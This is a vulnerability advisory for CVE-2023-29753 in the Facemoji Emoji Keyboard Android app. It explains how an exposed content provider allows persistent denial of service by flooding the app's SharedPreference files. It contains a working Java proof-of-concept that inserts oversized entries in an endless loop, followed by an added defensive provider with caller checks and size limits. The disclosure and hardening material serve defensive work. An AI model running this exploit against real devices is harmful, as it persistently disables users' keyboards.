CVE-2023-29753: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows a local attacker to cause a denial of service via the SharedPreference files.

Denial of Service exists in Facemoji Emoji Keyboard (CVE-2023-29753)

Vendor: EKATOX APPS (https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard (com.simejikeyboard)

Version: 2.9.1.2

Download link: https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE: An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows a local attacker to cause a denial of service via the SharedPreference files.

Additional information: The Facemoji Emoji Keyboard application exposes a component whose interface lets unauthorized applications modify the data in its SharedPreference file. The application loads this file into memory at startup. Once an attacker injects an excessive amount of data, loading it triggers an OOM error and the application crashes. Because the data is stored persistently in the SharedPreference file, the result is a persistent denial of service.

PoC:

    public void attack_keybord() {
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        // targetSharedPreferencesName: the name of any SharedPreferences file in the app
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/targetShardPreferencesName/xxx");
        while (true) {
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key", randomString);
            contentValues.put("value", randomString);
            contentResolver.insert(uri, contentValues);
        }
    }
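A defensive counterpart to the PoC above, added here as an illustration and not taken from the advisory or the vendor's code: a provider-side insert that rejects callers not signed with the app's own certificate and caps entry and file size before anything is written. The class name, URI layout and size limits are assumptions.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.SharedPreferences;
import android.content.pm.PackageManager;
import android.database.Cursor;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;
import java.util.List;
import java.util.Map;

// Hypothetical hardened provider: class name, URI layout and limits are assumptions.
public class GuardedPrefsProvider extends ContentProvider {
    private static final int MAX_ENTRY_CHARS = 4096;        // per key or value
    private static final long MAX_FILE_CHARS = 256 * 1024;  // per preference file
    @Override public boolean onCreate() { return true; }

    @Override public Uri insert(Uri uri, ContentValues values) {
        enforceTrustedCaller();
        List<String> seg = uri.getPathSegments(); // assumed layout: /string/<prefsName>/...
        if (seg.size() < 2 || values == null) throw new IllegalArgumentException("bad request");
        String key = values.getAsString("key");
        String value = values.getAsString("value");
        if (key == null || value == null
                || key.length() > MAX_ENTRY_CHARS || value.length() > MAX_ENTRY_CHARS)
            throw new IllegalArgumentException("entry missing or too large");
        SharedPreferences prefs = getContext().getSharedPreferences(seg.get(1), Context.MODE_PRIVATE);
        long total = key.length() + value.length();
        for (Map.Entry<String, ?> e : prefs.getAll().entrySet()) {
            if (!e.getKey().equals(key)) // the entry being overwritten is not counted twice
                total += e.getKey().length() + String.valueOf(e.getValue()).length();
        }
        if (total > MAX_FILE_CHARS) throw new IllegalStateException("preference file quota exceeded");
        prefs.edit().putString(key, value).apply();
        return uri;
    }
    // Accept only this app or packages signed with the same certificate.
    private void enforceTrustedCaller() {
        int caller = Binder.getCallingUid();
        if (caller != Process.myUid() && getContext().getPackageManager()
                .checkSignatures(caller, Process.myUid()) != PackageManager.SIGNATURE_MATCH)
            throw new SecurityException("caller uid " + caller + " is not permitted");
    }

    @Override public Cursor query(Uri u, String[] p, String s, String[] a, String o) { enforceTrustedCaller(); return null; }
    @Override public String getType(Uri u) { return null; }
    @Override public int delete(Uri u, String s, String[] a) { enforceTrustedCaller(); return 0; }
    @Override public int update(Uri u, ContentValues v, String s, String[] a) { enforceTrustedCaller(); return 0; }
}
```

If no other app needs the provider, declaring it with `android:exported="false"` in the manifest removes the exposure altogether.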
